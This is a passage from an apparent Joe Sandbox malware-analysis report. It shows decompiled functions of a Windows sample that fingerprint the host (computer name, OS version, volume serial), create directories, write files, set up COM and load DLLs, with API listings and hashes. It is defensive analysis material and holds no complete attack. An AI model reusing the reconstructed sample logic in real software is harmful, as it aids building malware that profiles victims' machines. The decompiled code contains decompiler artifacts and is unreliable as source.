							 *((short*)(_t74[1] + _t39 * 2)) =  <=  ? _t59 : _t53 + 0x2a;
							_t19 = _t39 + 1; // 0x1
							_t58 = _t19;
							 *_t74 = _t19;
						} while (_t69 != 0x20);
						 *((short*)(_t74[1] + 2 + _t39 * 2)) = 0;
						 *_t74 = _t39 + _t39 + 4;
						_t41 = E006E3180(_t39 + _t39 + 4, _t74[1]);
						if(_t41 == 0) {
							_t61 = 0;
							goto L2;
						}
						_t63 = _t41;
						_t42 =  *0x6f9ac0; // 0x2f87c8
						if(_t42 != 0) {
							E006E91E0(_t42);
						}
						 *0x6f9ac0 = _t63;
						goto L1;
					}
				}
				L1:
				_t61 = 1;
				goto L2;
			}

0x006f5d00
0x006f5d0a
0x006f5d0c
0x006f5d12
0x006f5d15
0x006f5d27
0x006f5d2b
0x006f5d32
0x006f5d3f
0x006f5d44
0x006f5d49
0x006f5d1a
0x006f5d26
0x006f5d26
0x006f5d4b
0x006f5d4d
0x006f5d4f
0x006f5d57
0x006f5d5f
0x006f5d6e
0x006f5d73
0x006f5d76
0x006f5d7a
0x006f5d80
0x006f5d61
0x006f5d61
0x006f5d61
0x006f5d88
0x006f5d8d
0x006f5d90
0x006f5d93
0x006f5d97
0x006f5d97
0x006f5d99
0x006f5d9c
0x006f5daa
0x006f5dac
0x006f5dc0
0x006f5dc5
0x006f5dcc
0x006f5dd0
0x006f5de2
0x006f5de7
0x006f5de7
0x006f5dea
0x006f5df0
0x006f5e07
0x006f5e07
0x00000000
0x006f5df2
0x006f5df2
0x006f5df4
0x006f5dfb
0x006f5dfe
0x00000000
0x00000000
0x006f5e00
0x00000000
0x006f5e00
0x006f5e13
0x006f5e15
0x006f5e17
0x006f5e19
0x006f5e1c
0x006f5e1c
0x006f5e1e
0x006f5e25
0x006f5e28
0x006f5e36
0x006f5e3c
0x006f5e3f
0x006f5e42
0x006f5e44
0x006f5e4d
0x006f5e54
0x006f5e58
0x006f5e5c
0x006f5e5c
0x006f5e5f
0x006f5e5f
0x006f5e68
0x006f5e73
0x006f5e78
0x006f5e82
0x006f5ea3
0x00000000
0x006f5ea3
0x006f5e84
0x006f5e86
0x006f5e8d
0x006f5e90
0x006f5e95
0x006f5e98
0x00000000
0x006f5e98
0x006f5df0
0x006f5d17
0x006f5d19
0x00000000

APIs

GetVersionExW.KERNEL32(?), ref: 006F5D32
GetComputerNameW.KERNEL32(00000000), ref: 006F5D57

Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0

GetComputerNameW.KERNEL32(00000000), ref: 006F5D7A

Part of subcall function 006E8160: GetTickCount.KERNEL32(?,?,?,006E9394), ref: 006E8169

Sleep.KERNEL32(00000001), ref: 006F5E36

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: ComputerHeapName$AllocateCountProcessSleepTickVersion
String ID:
API String ID: 3448490110-0
Opcode ID: 80525e0abda4a641b8c635c3ea504b423f9db70a7ba3e1dffe5006474b2ba9a0
Instruction ID: 113aaf42e648de27a971c331630c30f16218de3bfc4115c107b35379b3c4ebc7
Opcode Fuzzy Hash: 80525e0abda4a641b8c635c3ea504b423f9db70a7ba3e1dffe5006474b2ba9a0
Instruction Fuzzy Hash: E9412AB15047085BDB20AF64DC89ABB76EAEF84344F05442DE78AC7352F7748D05CB66

Uniqueness

Uniqueness Score: -1.00%

Function 006F3200, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E006F3200(void* __eflags, intOrPtr _a4) {
				char _v216;
				signed short _v736;
				char _v752;
				intOrPtr _v758;
				signed int _v762;
				short _v764;
				intOrPtr _v768;
				short _t20;
				void* _t24;
				signed int _t28;
				signed int _t29;
				WCHAR* _t32;
				signed int _t33;
				WCHAR* _t34;
				intOrPtr _t37;
				DWORD* _t38;
				void* _t40;
				intOrPtr* _t41;
				DWORD* _t42;

				_t41 = _t40 - 0x2f4;
				_t34 =  &_v736;
				 *_t41 = 0;
				E006F6610(_t34, 0, 0x208);
				_t42 = _t41 + 0xc;
				if(GetWindowsDirectoryW(_t34, 0x208) == 0) {
					_t20 = 0x43;
					_v736 = 0x43;
				} else {
					_t20 = _v736 & 0x0000ffff;
				}
				_t37 = _a4;
				_t32 =  &_v752;
				_t38 = _t42;
				 *_t32 = _t20;
				_t32[1] = 0x5c003a;
				_t32[3] = 0;
				GetVolumeInformationW(_t32, 0, 0, _t38, 0, 0, 0, 0); // executed
				_t28 =  *_t38;
				_t35 = _t28 + _t28;
				_t29 = _t28 << 3;
				_v768 = _t28 + _t28;
				_v764 = _t28 * 4;
				_t24 = 0xfffffff8;
				_t33 = _t29;
				 *_t38 = _t29;
				_v762 = _t29;
				do {
					_t33 = _t33 + _t33;
					 *(_t42 + _t24 + 0x14) = _t33;
					_t24 = _t24 + 1;
				} while (_t24 != 0);
				 *_t42 = _t33;
				E006F4520(_t37, 0xb0);
				E006F4520( &_v216, 0xb1);
				_push(_v758);
				_push(_t29 & 0x0000fff8 | 0x00000001);
				return E006F68E0(_t37, 0x64,  &_v216, _t35);
			}

0x006f3204
0x006f3211
0x006f3215
0x006f321b
0x006f3220
0x006f322d
0x006f3236
0x006f323a
0x006f322f
0x006f322f
0x006f322f
0x006f3241
0x006f3248
0x006f324c
0x006f324e
0x006f3253
0x006f325a
0x006f3268
0x006f326e
0x006f3271
0x006f327b
0x006f327e
0x006f3282
0x006f3287
0x006f328c
0x006f328e
0x006f3291
0x006f3296
0x006f3296
0x006f3298
0x006f329c
0x006f329c
0x006f329f
0x006f32a8
0x006f32bd
0x006f32ce
0x006f32d2
0x006f32e7

APIs

GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 006F3225
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006F3268

Strings

C, xrefs: 006F323A

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: DirectoryInformationVolumeWindows
String ID: C
API String ID: 3487004747-1037565863
Opcode ID: a6a0355c80568cca8c29e6b6ff27465d6bd9b73777dbbcc3b1363e7bf602fee0
Instruction ID: 73aad1e1aa54b6058f7982ce9dbc441a384eb9e57fd7f0ffe806e9dfa4fe0186
Opcode Fuzzy Hash: a6a0355c80568cca8c29e6b6ff27465d6bd9b73777dbbcc3b1363e7bf602fee0
Instruction Fuzzy Hash: 2921F270508304ABE710AF14EC85B7B7BEDEF85748F00442CF948D6241E7359A09C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 006ED8B0, Relevance: 4.6, APIs: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E006ED8B0(intOrPtr* __ecx) {
				intOrPtr _t7;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t15;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr _t23;

				 *((short*)(__ecx + 0x14)) = 0;
				_t20 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t23 =  *0x6f9bb4; // 0x1
				if(_t23 == 0) {
					_t15 = _t21;
					E006F4520(_t15, 0x7a);
					_t12 =  *0x6f9da8(_t15, 0, 0, 0, 0); // executed
					 *0x6f9adc = _t12;
					 *0x6f9dbc(_t12, 0x15f90, 0x15f90, 0x2bf20, 0x927c0);
					InitializeCriticalSectionAndSpinCount(0x6f9b64, 0x800);
					 *0x6f9bb4 =  *0x6f9bb4 + 1;
				}
				 *0x6f9d54(0x6f9b64);
				_t7 =  *0x6f9c24; // 0x1
				_t8 = _t7 + 1;
				 *0x6f9c24 = _t8;
				 *_t20 = _t8;
				 *0x6f9d9c(0x6f9b64);
				return _t20;
			}

0x006ed8bb
0x006ed8c1
0x006ed8c3
0x006ed8c6
0x006ed8c9
0x006ed8cc
0x006ed8cf
0x006ed8d5
0x006ed8d7
0x006ed8dc
0x006ed8e9
0x006ed8ef
0x006ed906
0x006ed916
0x006ed91c
0x006ed91c
0x006ed928
0x006ed92e
0x006ed933
0x006ed934
0x006ed939
0x006ed93c
0x006ed94d

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(006F9B64,00000800,?,00000000,00000000,00000000,00000000), ref: 006ED916
RtlEnterCriticalSection.NTDLL(006F9B64), ref: 006ED928
RtlLeaveCriticalSection.NTDLL(006F9B64), ref: 006ED93C

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: CriticalSection$CountEnterInitializeLeaveSpin
String ID:
API String ID: 29772495-0
Opcode ID: 0b301f34b93b771aba26fcb789bd4d5edc0e3d6c79141eb8be6a9f98e1e0cd2b
Instruction ID: 1021c57af294f0b9aab2d32dc9df6476acaae61a81e3e7fb74d21e4081c3b007
Opcode Fuzzy Hash: 0b301f34b93b771aba26fcb789bd4d5edc0e3d6c79141eb8be6a9f98e1e0cd2b
Instruction Fuzzy Hash: D101CCB0A00200AFC3109F29FD89F337ABAEFC5706B20602EB5489A261DA754802CB70

Uniqueness

Uniqueness Score: -1.00%

Function 006E3180, Relevance: 4.5, APIs: 3, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006E3180(signed int _a4, void* _a8) {
				void* _t3;
				void* _t4;
				long _t9;
				signed int _t10;
				void* _t11;

				_t3 =  *0x6f9c2c; // 0x2b0000
				_t11 = _a8;
				_t10 = _a4;
				if(_t3 == 0) {
					_t3 = GetProcessHeap();
					 *0x6f9c2c = _t3;
				}
				_t9 = ( ~_t10 & 0x0000000f) + _t10;
				if(_t11 == 0) {
					_t4 = RtlAllocateHeap(_t3, 8, _t9); // executed
					return _t4;
				} else {
					return RtlReAllocateHeap(_t3, 8, _t11, _t9);
				}
			}

0x006e3182
0x006e3187
0x006e318b
0x006e3191
0x006e3193
0x006e3199
0x006e3199
0x006e31a5
0x006e31a9
0x006e31bc
0x00000000
0x006e31ab
0x00000000
0x006e31b0

APIs

GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
RtlAllocateHeap.NTDLL(002B0000,00000008,?), ref: 006E31BC

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Heap$Allocate$Process
String ID:
API String ID: 980559045-0
Opcode ID: 237dc0fd949bfb41448f3265c8fc31567297a9166f06f138131c4969cfba5c7a
Instruction ID: 0c4bca6c20829b5b21ab4b62561a2e555249d56bec029b71b6ede3c655fc5011
Opcode Fuzzy Hash: 237dc0fd949bfb41448f3265c8fc31567297a9166f06f138131c4969cfba5c7a
Instruction Fuzzy Hash: 47E06DB2681360ABDB188B26EC0DBFA37ABEBC4711B08550DF901D7344DA70A800CB70

Uniqueness

Uniqueness Score: -1.00%

Function 006EAB10, Relevance: 4.5, APIs: 3, Instructions: 23
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006EAB10() {
				signed char _t2;
				int _t4;
				WCHAR* _t6;
				WCHAR* _t7;

				if( *0x6f9c04 == 0) {
					_t6 = _t7;
					E006F4520(_t6, 0x50);
					_t2 = GetFileAttributesW(_t6); // executed
					if(_t2 == 0xffffffff) {
						L4:
						_t4 = CreateDirectoryW(_t6, 0); // executed
						return _t4;
					}
					if((_t2 & 0x00000010) == 0) {
						DeleteFileW(_t6);
						goto L4;
					}
				}
				return _t2;
			}

0x006eab1e
0x006eab20
0x006eab25
0x006eab2e
0x006eab37
0x006eab44
0x006eab47
0x00000000
0x006eab47
0x006eab3b
0x006eab3e
0x00000000
0x006eab3e
0x006eab3b
0x006eab54

APIs

GetFileAttributesW.KERNELBASE ref: 006EAB2E
DeleteFileW.KERNEL32 ref: 006EAB3E
CreateDirectoryW.KERNELBASE(?,00000000), ref: 006EAB47

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: File$AttributesCreateDeleteDirectory
String ID:
API String ID: 3749538849-0
Opcode ID: 718f4e5c445ff75d989ff0a0f0f3bb3e754848c0b26f5781e07e24094815424f
Instruction ID: 96bedeafb21210265acd2dea320b7326521b79e477afdd9f032aa9ef9ea40832
Opcode Fuzzy Hash: 718f4e5c445ff75d989ff0a0f0f3bb3e754848c0b26f5781e07e24094815424f
Instruction Fuzzy Hash: 57E08630443A64A7E7202328BC0AFEA3A174F12326F001310F525552D1EF18159B86EB

Uniqueness

Uniqueness Score: -1.00%

Function 006F3F50, Relevance: 4.5, APIs: 3, Instructions: 20
sleepCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E006F3F50(intOrPtr _a4) {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr _t8;

				_t8 = _a4;
				_t7 =  *0x6f9d54;
				_t5 =  *0x6f9d9c;
				L1:
				 *_t7(0x6f9bbc);
				_t6 =  *0x6f9a94; // 0x2fd120
				if( *_t6 != 0) {
					E006F1A70(_t6, _t8);
				}
				 *_t5(0x6f9bbc);
				Sleep(0xbb8); // executed
				goto L1;
			}

0x006f3f54
0x006f3f58
0x006f3f5e
0x006f3f6a
0x006f3f6f
0x006f3f71
0x006f3f7a
0x006f3f7d
0x006f3f7d
0x006f3f87
0x006f3f8e
0x00000000

APIs

RtlEnterCriticalSection.NTDLL(006F9BBC), ref: 006F3F6F
RtlLeaveCriticalSection.NTDLL(006F9BBC), ref: 006F3F87
Sleep.KERNELBASE(00000BB8), ref: 006F3F8E

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleep
String ID:
API String ID: 1566154052-0
Opcode ID: 1165d6182099d92479aea8336a49f07fe0f9d640d184ab1f6601173171981c5f
Instruction ID: 28d6a664f900d18db41ccd4f47351660bf7317e60980e239ba2f1b918e0f5ea9
Opcode Fuzzy Hash: 1165d6182099d92479aea8336a49f07fe0f9d640d184ab1f6601173171981c5f
Instruction Fuzzy Hash: E0E0EC3110562CABD700EB6AED85F7673BBEF86784F111049E600533A047A16D01CA76

Uniqueness

Uniqueness Score: -1.00%

Function 006E2DA0, Relevance: 3.1, APIs: 2, Instructions: 56
comCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E006E2DA0() {
				void* _t3;
				void* _t6;
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t13;
				void* _t14;

				if( *0x6f9bb8 != 0) {
					L2:
					if((GetVersion() & 0x000000fe) > 5) {
						_push(0x6f9aa8);
						_push(0x6f9b30);
						_push(1);
						_push(0);
						_push(0x6f9c0c); // executed
					} else {
						_push(0x6f9bf4);
						_push(0x6f9bd8);
						_push(1);
						_push(0);
						_push(0x6f9afc);
					}
					_t3 =  *0x6f9df0(); // executed
					_t13 = _t3;
					if(_t3 < 0) {
						_t12 = _t14;
						E006F4520(_t14, 0x30);
						E006F68E0( *0x6f9bb8, 0x200, _t12, _t13);
						_t6 = 0;
						_t10 = 0xffffffffffffffff;
					} else {
						_t10 = 1;
						_t6 = 1;
					}
					 *0x6f9bf8 = _t10;
					return _t6;
				}
				_t7 = E006E3180(0x400, 0);
				_t14 = _t14 + 8;
				 *0x6f9bb8 = _t7;
				if(_t7 == 0) {
					return 0;
				}
				goto L2;
			}

0x006e2daf
0x006e2dcd
0x006e2ddb
0x006e2df2
0x006e2df7
0x006e2dfc
0x006e2dfe
0x006e2e00
0x006e2ddd
0x006e2ddd
0x006e2de2
0x006e2de7
0x006e2de9
0x006e2deb
0x006e2deb
0x006e2e05
0x006e2e0b
0x006e2e0f
0x006e2e18
0x006e2e1d
0x006e2e32
0x006e2e3a
0x006e2e3e
0x006e2e11
0x006e2e13
0x006e2e14
0x006e2e14
0x006e2e3f
0x00000000
0x006e2e3f
0x006e2db8
0x006e2dbd
0x006e2dc2
0x006e2dc7
0x00000000
0x006e2e4e
0x00000000

APIs

GetVersion.KERNEL32 ref: 006E2DCD
CoCreateInstance.OLE32(006F9C0C,00000000,00000001,006F9B30,006F9AA8), ref: 006E2E05

Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0

Part of subcall function 006F68E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000400), ref: 006F6A15

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Heap$AllocateByteCharCreateInstanceMultiProcessVersionWide
String ID:
API String ID: 2686302260-0
Opcode ID: 5e825f7a167cca5b756b4a580840fd43f7c9290974903563d66f278bd2b9187e
Instruction ID: 582e30cf9ef057164675ef112b843b55a0b6dad8922aaaee6236ad0e40084e4b
Opcode Fuzzy Hash: 5e825f7a167cca5b756b4a580840fd43f7c9290974903563d66f278bd2b9187e
Instruction Fuzzy Hash: DA01DF3179136677E7682626BC9BFB7346B8B10B4AF250029F712E52E1E9908042C1B9

Uniqueness

Uniqueness Score: -1.00%

Function 006F2E00, Relevance: 3.0, APIs: 2, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006F2E00(void* _a4, void* _a8, long _a12) {
				char _v16;
				void _v18;
				void* _t10;
				int _t12;
				int _t14;
				signed int _t15;
				long _t17;
				DWORD* _t18;
				void* _t19;

				_t10 = _a8;
				_t15 = 0;
				if(_t10 == 0) {
					L8:
					return _t15;
				}
				_t17 = _a12;
				_v18 = 0xa0d;
				if(_t17 != 0) {
					L6:
					_t19 = _a4;
					_t18 =  &_v16;
					_t12 = WriteFile(_t19, _t10, _t17, _t18, 0); // executed
					if(_t12 != 0) {
						_t14 = WriteFile(_t19,  &_v18, 2, _t18, 0); // executed
						_t15 = 0 | _t14 != 0x00000000;
					}
					goto L8;
				}
				_t17 = 0;
				while( *((char*)(_t10 + _t17)) != 0) {
					_t17 = _t17 + 1;
					if(_t17 != 0x4000) {
						continue;
					}
					_t15 = 0;
					goto L8;
				}
				goto L6;
			}

0x006f2e06
0x006f2e0a
0x006f2e0e
0x006f2e64
0x006f2e6c
0x006f2e6c
0x006f2e10
0x006f2e14
0x006f2e1d
0x006f2e34
0x006f2e34
0x006f2e38
0x006f2e42
0x006f2e4a
0x006f2e57
0x006f2e61
0x006f2e61
0x00000000
0x006f2e4a
0x006f2e1f
0x006f2e21
0x006f2e27
0x006f2e2e
0x00000000
0x00000000
0x006f2e30
0x00000000
0x006f2e30
0x00000000

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 006F2E42
WriteFile.KERNELBASE(?,00000A0D,00000002,?,00000000), ref: 006F2E57

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4d6112152cf265851cbbf864cec24f318ce769dee83d6c5a8a3c86daa355d6cc
Instruction ID: 7e3b53c13030c65758b227fd3373b70215dd2b9cb82ef0e2b2c7ab27ae3c7aed
Opcode Fuzzy Hash: 4d6112152cf265851cbbf864cec24f318ce769dee83d6c5a8a3c86daa355d6cc
Instruction Fuzzy Hash: 6EF081312153476FE7288AA19C99FBB3AADAF86701F10402CFB45D6190D6649C0DCB61

Uniqueness

Uniqueness Score: -1.00%

Function 006F2D90, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 006F2D95
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 006F2DAD

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Initialize$Security
String ID:
API String ID: 119290355-0
Opcode ID: 1918dde7c9278efc6d70e32bc238cbc25ad8ba529b60749b9e1f72aa1ddecb8f
Instruction ID: feaf0d9df77cfc66f972ba5d617bc71ff4944f7425e4362f4bf8e96dfa14c437
Opcode Fuzzy Hash: 1918dde7c9278efc6d70e32bc238cbc25ad8ba529b60749b9e1f72aa1ddecb8f
Instruction Fuzzy Hash: 4BD052B2B026313AF6202A742C1CFB3A90DDF01BA0B120321FE10E72C0E2208E4182F0

Uniqueness

Uniqueness Score: -1.00%

Function 006EB250, Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E006EB250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v28;
				intOrPtr _v32;
				intOrPtr _v52;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				intOrPtr _v248;
				char _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v280;
				intOrPtr _t26;
				intOrPtr _t29;
				char _t30;
				void* _t37;
				void* _t41;
				intOrPtr _t48;
				char _t52;
				char* _t56;
				intOrPtr* _t57;
				void* _t60;

				_t57 =  &_v220;
				_t48 = _a16;
				_t52 = 0;
				 *_t57 = 0;
				_v228 = 0;
				_v224 = 0;
				_v220 = 0;
				_v232 = 0;
				if((GetVersion() & 0x000000fe) >= 6) {
					if( *0x6f9bf0 == 0) {
						L18:
						return _t52;
					}
					_t26 =  *0x6f9c30; // 0x308d10
					if(_t26 == 0) {
						goto L18;
					}
					_push(0x800d);
					_push( &_v224);
					_push( &_v228);
					_push(_a8);
					_push(_a4);
					if(E006EF800() == 0) {
						_t52 = 0;
						L12:
						_t29 =  *_t57;
						if(_t29 != 0) {
							 *0x6f9f04(_t29);
						}
						_t30 = _v232;
						if(_t30 != 0) {
							 *0x6f9efc(_t30, 0);
						}
						_t31 = _v228;
						if(_v228 != 0) {
							E006E91E0(_t31);
						}
						goto L18;
					}
					_t56 =  &_v216;
					E006F4520(_t56, 0x28);
					_t57 = _t57 + 8;
					_t52 = 0;
					_t37 =  *0x6f9f08( &_v232, _t56, 0, 0); // executed
					if(_t37 < 0) {
						goto L12;
					}
					E006F7C90( *0x6f9c30,  *0x6f9a9c);
					E006F4520(_t56, 0x29);
					_t60 = _t57 + 0x10;
					_t52 = 0;
					_t41 =  *0x6f9f00(_v248, 0, _t56, _t60,  *0x6f9c30,  *0x6f9a9c, 0);
					E006F7C90( *0x6f9c30,  *0x6f9a9c);
					_t57 = _t60 + 8;
					if(_t41 < 0) {
						goto L12;
					}
					if(_t48 != 0) {
						L10:
						 *0x6f9ef4(_v280, 0, _v272, _v268, _v32, _t48, 0); // executed
						_t52 = 0xbadbac;
						goto L12;
					}
					E006F4520(_t56, 0x2a);
					_t57 = _t57 + 8;
					_push(0);
					_push( &_v264);
					_push(4);
					_push( &_v28);
					_push(_t56);
					_push(_v280);
					if( *0x6f9ef8() < 0) {
						goto L12;
					}
					_t48 = _v52;
					goto L10;
				}
				_t52 = 1;
				goto L18;
			}

0x006eb254
0x006eb25a
0x006eb261
0x006eb263
0x006eb266
0x006eb26a
0x006eb26e
0x006eb272
0x006eb284
0x006eb295
0x006eb3e0
0x006eb3ec
0x006eb3ec
0x006eb29b
0x006eb2a2
0x00000000
0x00000000
0x006eb2b0
0x006eb2b5
0x006eb2b6
0x006eb2b7
0x006eb2be
0x006eb2cc
0x006eb3ae
0x006eb3b0
0x006eb3b0
0x006eb3b5
0x006eb3b8
0x006eb3b8
0x006eb3be
0x006eb3c4
0x006eb3c9
0x006eb3c9
0x006eb3cf
0x006eb3d5
0x006eb3d8
0x006eb3dd
0x00000000
0x006eb3d5
0x006eb2d2
0x006eb2d9
0x006eb2de
0x006eb2e1
0x006eb2eb
0x006eb2f3
0x00000000
0x00000000
0x006eb305
0x006eb310
0x006eb315
0x006eb318
0x006eb330
0x006eb344
0x006eb349
0x006eb34e
0x00000000
0x00000000
0x006eb352
0x006eb386
0x006eb39e
0x006eb3a9
0x00000000
0x006eb3a9
0x006eb357
0x006eb35c
0x006eb36a
0x006eb36c
0x006eb36d
0x006eb36f
0x006eb370
0x006eb371
0x006eb37d
0x00000000
0x00000000
0x006eb37f
0x00000000
0x006eb37f
0x006eb288
0x00000000

APIs

GetVersion.KERNEL32 ref: 006EB276

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 0a34f0371e69d016c073472f1af01145be73346e823e9cba9c59c7600be1118f
Instruction ID: 530daa649add55ae17a96ed66ca0d65cd859e1a585f0c52575b2f6e598775c7e
Opcode Fuzzy Hash: 0a34f0371e69d016c073472f1af01145be73346e823e9cba9c59c7600be1118f
Instruction Fuzzy Hash: 8041B072605356AFD7209F61EC46F7BBBAEEF44744F00142AFA48C2160E7719814DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 006EC6D0, Relevance: 1.5, APIs: 1, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006EC6D0(short* _a4) {
				struct _OBJDIR_INFORMATION _v12;
				short* _t8;
				long _t10;
				struct _EXCEPTION_RECORD _t12;
				UNICODE_STRING* _t14;
				struct _OBJDIR_INFORMATION _t15;
				HMODULE* _t16;
				short _t18;

				_t16 =  &_v12;
				_t8 = _a4;
				 *_t16 = 0;
				_t12 = 0;
				if( *_t8 != 0) {
					do {
						_t18 =  *((short*)(_t8 + _t12 + 2));
						_t12 = _t12 + 2;
					} while (_t18 != 0);
				}
				_t14 =  &_v12;
				_t15 = 0;
				 *_t14 = _t12;
				 *((short*)(_t14 + 2)) = _t12 + 2;
				 *((intOrPtr*)(_t14 + 4)) = _t8;
				_t10 = LdrLoadDll(0, 0, _t14, _t16); // executed
				if(_t10 >= 0) {
					_t15 =  *_t16;
				}
				return _t15;
			}

0x006ec6d1
0x006ec6d4
0x006ec6d8
0x006ec6df
0x006ec6e5
0x006ec6e7
0x006ec6e7
0x006ec6ed
0x006ec6ed
0x006ec6e7
0x006ec6f2
0x006ec6f6
